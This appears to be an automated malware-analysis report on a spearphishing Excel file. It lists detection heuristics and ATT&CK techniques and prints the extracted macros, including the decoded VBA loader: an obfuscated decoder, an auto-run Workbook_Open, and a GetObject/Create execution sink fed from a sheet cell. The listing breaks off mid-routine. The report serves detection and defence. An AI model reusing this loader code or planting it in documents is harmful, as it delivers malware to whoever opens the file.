MALICIOUS
Risk Score: 280
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The file is an Excel document containing both VBA and Excel 4.0 macros, with critical heuristics indicating an obfuscated auto-exec loader. The VBA macro uses GetObject to create and execute an object, likely downloading and running a second-stage payload. The presence of both macro types and the obfuscation suggests a sophisticated downloader, commonly used in spearphishing campaigns.
Heuristics (7)
- ClamAV: Xls.Malware.Valyria-9756472-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Xls.Malware.Valyria-9756472-0
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Workbook_Open macro [high, OLE_VBA_WBOPEN]: Workbook_Open macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Excel 4.0 (XLM) macro sheet present [medium, OLE_XLM_AUTOOPEN]: Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 1802 bytes |

SHA-256: 89fbf4ed436db0a706f3c5f49740bc1a215ec9721c9730853a5fba9ba9508dc6
Preview script: first 1,000 lines of the extracted script
' 0085 17 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Test Pag ' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - HGUR ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value ' Test Pag,B7,*STACKERROR* not enough arguments for function: RAND,"" ' Test Pag,C7,*STACKERROR* not enough arguments for function: RAND,"" ' Test Pag,B8,[],"" ' Test Pag,C8,[],"" ' Test Pag,B9,[],"" ' Test Pag,C9,[],"" ' Test Pag,B10,[],"" ' Test Pag,C10,[],"" ' Test Pag,B11,[],"" ' Test Pag,C11,[],"" ' Test Pag,B12,[],"" ' Test Pag,C12,[],"" ' Test Pag,B13,[],"" ' Test Pag,C13,[],"" ' Test Pag,B14,[],"" ' Test Pag,C14,[],"" ' Test Pag,B15,[],"" ' Test Pag,C15,[],"" ' Test Pag,B16,[],"" ' Test Pag,C16,[],"" ' Test Pag,B17,[],"" ' Test Pag,C17,[],"" ' Test Pag,B18,[],"" ' Test Pag,C18,[],"" ' Test Pag,B19,[],"" ' Test Pag,C19,[],"" ' Test Pag,B20,[],"" ' Test Pag,C20,[],"" ' Test Pag,B21,[],"" ' Test Pag,C21,[],"" ' Test Pag,B22,[],"" ' Test Pag,C22,[],"" ' Test Pag,B23,[],"" ' Test Pag,C23,[],"" ' Test Pag,B24,[],"" ' Test Pag,C24,[],"" ' Test Pag,B25,[],"" ' Test Pag,C25,[],"" ' Test Pag,B26,[],"" ' Test Pag,C26,[],"" ' Test Pag,B27,[],"" ' Test Pag,C27,[],"" ' Test Pag,B28,[],"" ' Test Pag,C28,[],"" ' Test Pag,B29,[],"" ' Test Pag,C29,[],"" ' Test Pag,B30,[],"" ' Test Pag,C30,[],"" ' Test Pag,B31,[],"" ' Test Pag,C31,[],"" |
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5380 bytes |

SHA-256: 97fe2c640d87e90ccefeed37ff424eb40b033eee1593c570f4d8bd046590cfbe
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private ra791e361394df2 As Variant
Private Function r5e63526981(b5ce25564f As Long) As String
Dim ed6d85e1f9c2 As Long: Dim df94f1edcdea6e As String
For ed6d85e1f9c2 = 1 To Len(ra791e361394df2(b5ce25564f)) Step 2: df94f1edcdea6e = df94f1edcdea6e & Chr(CInt(Chr(Int(0 - 13 - 5 + 9 + 3 + 7 + Int(12 / 7) - 10 + Int(12 / 4) + 8 + 35)) & Chr(Int(0 + 4 + Int(9 / 1) - 8 + Int(9 / 9) + 7 + 59)) & Mid(ra791e361394df2(b5ce25564f), ed6d85e1f9c2, 2)) - 4): Next
r5e63526981 = df94f1edcdea6e
End Function
Private Sub m9ebcfd864b5()
ra791e361394df2 = Split(ThisWorkbook.Sheets("HGURG").Range("J106").Value, ","): Dim ze67833e9a1: Set ze67833e9a1 = GetObject(r5e63526981(1)): ze67833e9a1.Create r5e63526981(0), Null, Null, Null
End Sub
Function Interpolate(X, x0 As Range, y0 As Range)
Dim n, i, j, k As Integer
'Check that rows are same size'
If (x0.Cells.Count <> y0.Cells.Count) Then
MsgBox ("X and Y vector to interpolate command has to be same size!")
End If
n = x0.Cells.Count
For i = 1 To n - 1
j = x0(i).Value
k = x0(i + 1).Value
If j > k Then
MsgBox ("X vector to interpolate command has to be increasing!")
Return
End If
Next i
If X < x0(1).Value Then
k = (y0(2).Value - y0(1).Value) / (x0(2).Value - x0(1).Value)
Interpolate = y0(1).Value + (X - x0(1).Value) * k
'Check if X0>x0(END)'
ElseIf X > x0(n).Value Then
k = (y0(n).Value - y0(n - 1).Value) / (x0(n).Value - x0(n - 1).Value)
Interpolate = y0(n).Value + (X - x0(n).Value) * k
Else
'Loop through values and find where the value are'
For i = 1 To n
If X <= x0(i).Value Then
If (x0(i).Value - x0(i - 1).Value) <> 0 Then
k = (y0(i).Value - y0(i - 1).Value) / (x0(i).Value - x0(i - 1).Value)
Interpolate = y0(i).Value + (X - x0(i).Value) * k
Else
Interpolate = y0(i).Value + x0(i).Value
End If
Exit For
End If
Next i
End If
End Function
Sub Workbook_Open()
Dim rffa72741bff76f As Long: rffa72741bff76f = 18
Dim tbcbdfa72a93736c As String
Dim z4c25f5aa6a189cf As Long
Select Case rffa72741bff76f
Case 5 * Int(75 / 79) - Int(3254 / 961) * 17
If 9 > 6 Then
Dim tomNet0 As Long
tomNet0 = (21 - 14) / 7
Dim xTopp0 As Long
xTopp0 = (tomNet0 / 25) - 9
Else
Dim lastNt0 As Long
lastNt0 = ((17 / 21) - 23)
Dim yRet0 As Long
yRet0 = (lastNt0 - 10) - 16
End If
Case 29 / Int(23 + 16 / 19) / 12
If 11 > 27 Then
Dim tomNet1 As Long
tomNet1 = (13 - 4) + 7
Dim xTopp1 As Long
xTopp1 = (tomNet1 + 8) - 26
Else
Dim lastNt1 As Long
lastNt1 = ((6 - 26) - 25)
Dim yRet1 As Long
yRet1 = (lastNt1 / 11) - 27
End If
Case 22 / Int(9 + 11 / 20) / 16
If 16 > 21 Then
Dim tomNet2 As Long
tomNet2 = (18 - 18) - 22
Dim xTopp2 As Long
xTopp2 = (tomNet2 - 13) - 22
Else
Dim lastNt2 As Long
lastNt2 = ((16 + 15) - 24)
Dim yRet2 As Long
yRet2 = (lastNt2 + 14) - 27
End If
Case 27 / Int(19 + 14 / 4) / 12
If 9 > 24 Then
Dim tomNet3 As Long
tomNet3 = (17 - 12) - 29
Dim xTopp3 As Long
xTopp3 = (tomNet3 - 26) - 24
Else
Dim lastNt3 As Long
lastNt3 = ((22 - 15) - 19)
Dim yRet3 As Long
yRet3 = (lastNt3 - 13) - 29
End If
Case 6 + (192 - 288) + 22
If 5 > 22 Then
Dim tomNet4 As Long
tomNet4 = (14 - 14) * 20
Dim xTopp4 As Long
xTopp4 = (tomNet4 + 20) - 9
Else
Dim lastNt4 As Long
lastNt4 = ((16 - 28) - 28)
Dim yRet4 As Long
yRet4 = (lastNt4 + 9) - 17
End If
Case 18 - (27 + 15) - 28
If 26 > 24 Then
Dim tomNet5 As Long
tomNet5 = (6 - 11) * 11
Dim xTopp5 As Long
xTopp5 = (tomNet5 * 15) - 6
Else
Dim lastNt5 As Long
lastNt5 = ((26 - 24) - 19)
Dim yRet5 As Long
yRet5 = (lastNt5 / 8) - 8
End If
Case ((((18 * 8) / 4) * 4) / 8):
Dim tomNet6 As Long
tomNet6 = (25 / 10) + 5 / 15
Dim
... (truncated)